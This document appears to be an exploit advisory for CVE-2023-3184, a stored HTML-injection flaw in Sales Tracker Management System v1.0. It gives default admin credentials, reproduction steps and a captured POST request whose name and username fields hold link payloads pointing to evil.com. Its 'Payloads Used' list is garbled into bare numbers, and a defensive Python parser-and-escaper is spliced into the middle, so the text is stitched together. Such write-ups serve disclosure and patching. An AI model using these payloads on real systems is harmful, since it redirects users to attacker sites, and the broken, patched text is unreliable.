
Sales Tracker Management System v1.0 - Multiple Vulnerabilities

Exploit Title: Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Google Dork: NA
Date: 09-06-2023
Exploit Author: affan ahmed
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://ww.sourcecodester.com/downl...em+System+using+php+fefree+source+source+code
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE: CVE-2023-3184
======================================
Credentials Used
======================================
Admin Account
Username: admin
Password: Admin123
=======================================
Payloads Used
=======================================
1
2
3
4
========================================
Steps to Reproduce
========================================
1. First, log in to your account using the admin credentials given above.
2. Then go to the user list and click the "Create New" button, or visit this URL: http://localhost/php-sts/admin/?page=user/manage_user
3. Then fill in the details and put the above payloads into the `firstname`, `middlename`, `lastname` and `username` fields.
4. After entering the payloads, click the "Save" button.
5. After the form is saved, you will be redirected to the admin site, where you can see that the new user has been added.
6. On clicking each payload, it redirected me to the evil website.
====================================================
Burp Suite Request
====================================================
POST /php-sts/classes/users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua:
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7HWJNQW3MptdFowo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="id"

------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>click_here_for_firstname</a>
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>click_here_for_middlename</a>
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>click_here_for_lastname</a>
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="username"

<a href=//evil.com>click_here_for_username</a>
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7HWJNQW3MptdFowo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary7HWJNQW3MptdFowo--
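The request above shows where the stored-XSS signal lives: HTML markup inside plain-text profile fields. The following is an added example for defenders (not code from the advisory or from the Sales Tracker project): it parses a multipart/form-data body of the same shape as the save request, flags the fields that carry tags, and shows the output encoding the admin page needs before echoing a stored field. The boundary and field names mirror the page; the body is constructed here.

```python
import html
import re

# Added illustration, not code from the advisory or from the Sales Tracker project.
# Boundary and field names mirror the request above; the body values are constructed.
BOUNDARY = "----WebKitFormBoundary7HWJNQW3MptdFowo"
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")  # any HTML start or end tag


def _part(name: str, value: str) -> str:
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'


# Constructed body in the same shape as the page's save request (no real upload).
SAMPLE_BODY = "".join([
    _part("id", ""),
    _part("firstname", "<a href=//evil.com>click_here_for_firstname</a>"),
    _part("middlename", "<a href=//evil.com>click_here_for_middlename</a>"),
    _part("lastname", "<a href=//evil.com>click_here_for_lastname</a>"),
    _part("username", "<a href=//evil.com>click_here_for_username</a>"),
    _part("password", "1234"),
    _part("type", "2"),
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="img"; filename=""\r\n'
    "Content-Type: application/octet-stream\r\n\r\n\r\n",
]) + f"--{BOUNDARY}--\r\n"


def parse_multipart(body: str, boundary: str) -> dict[str, str]:
    """Minimal multipart/form-data parser: returns text fields, skips file parts."""
    fields: dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name and "filename=" not in headers:
            fields[name.group(1)] = value
    return fields


def find_html_injection(fields: dict[str, str]) -> list[str]:
    """Names of text fields carrying markup: the signal to log or reject at save time."""
    return [name for name, value in fields.items() if TAG_RE.search(value)]


def escape_for_html(value: str) -> str:
    """Output encoding the admin page needs before echoing a stored field into HTML."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("flagged fields:", find_html_injection(parsed))
    print("safe rendering:", escape_for_html(parsed["firstname"]))
```

Rejecting or logging flagged fields on the save endpoint catches the injection at the source, while the escaping is what stops an already-stored value from rendering as a link.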
========================================
Proof of Concept
========================================
GitHub Link: https://github.com/ctflearner/vulnerabily/blob/main/sales_tracker_tracker_management_system/stms.md